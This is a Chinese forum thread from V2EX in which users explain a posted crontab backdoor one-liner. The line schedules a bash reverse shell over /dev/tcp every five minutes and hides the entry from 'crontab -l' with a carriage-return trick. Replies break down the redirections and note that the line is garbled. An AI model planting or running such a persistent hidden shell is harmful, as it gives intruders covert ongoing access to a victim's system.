麻烦懂的详细解释下这段 shell 脚本

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个创建于 2913 天前的主题，其中的信息可能已经有所发展或是发生改变。

直接贴代码了，如下：

(crontab -l;printf "*/5 * * * * exec9<> /dev/tcp/localhost/8080&&exec0<&9&&exec1>&92>&1&&/bin/bash --noprofile – I;\rno crontab for whoami%100c\n")|crontab -

嗯，这是一段 crontab 后门的代码

crontab

代码

printf

exec9

12 条回复 • 2016-11-26 13:06:30 +08:00

lrvy

2016-11-25 17:15:59 +08:00

监听本地 8080 端口 nc -l -p 8080

redsonic

2016-11-25 17:19:07 +08:00

传说中的用 bash 进行网络通讯

Tink

2016-11-25 17:25:08 +08:00

http://explainshell.com/explain?cmd=%28crontab+-l%3Bprintf+%22*%2F5+*+*+*+*+exec9%3C%3E+%2Fdev%2Ftcp%2Flocalhost%2F8080%26%26exec0%3C%269%26%26exec1%3E%2692%3E%261%26%26%2Fbin%2Fbash+--noprofile+%E2%80%93+I%3B%5Crno+crontab+for+whoami%25100c%5Cn%22%29%7Ccrontab+-

Tink

2016-11-25 17:25:28 +08:00

http://explainshell.com/

skydiver

2016-11-25 18:03:13 +08:00

感觉是复制粘贴错了吧，根本运行不了

Owenjia

2016-11-25 18:22:10 +08:00

这是从哪复制来的？好像不太对吧？貌似有些是转义过的，后面那个 –（ U+2013 ）……
格式化下应该就好看懂了，主要是重定向和文件描述符。

exec 9<> /dev/tcp/localhost/8080
exec 0 <& 9
exec 1 >& 9 2>& 1

skydiver

2016-11-25 18:27:50 +08:00

@Owenjia 运行不了，后来发现是因为我用的 zsh ， bash 里这样才行

rrfeng

2016-11-25 18:32:38 +08:00

约等于于在 8080 开了个 bash ……

Owenjia

2016-11-25 18:39:23 +08:00

@skydiver
恩， zsh 没有 /dev/{tcp,udp}/host/port ，不过可以用 zshtcpsys 。

skydiver

2016-11-26 00:17:20 +08:00 via Android

@rrfeng 这个并没有监听端口吧

rrfeng

2016-11-26 12:28:00 +08:00 via Android

@skydiver
/dev/tcp/localhost/8080
这就是端口

skydiver

2016-11-26 13:06:30 +08:00

@rrfeng 我试了，这个并不会监听端口，只会连接到端口， bash 告诉我 Connection refused

就算是监听也不应该监听 localhost 啊，那样外面又连不上……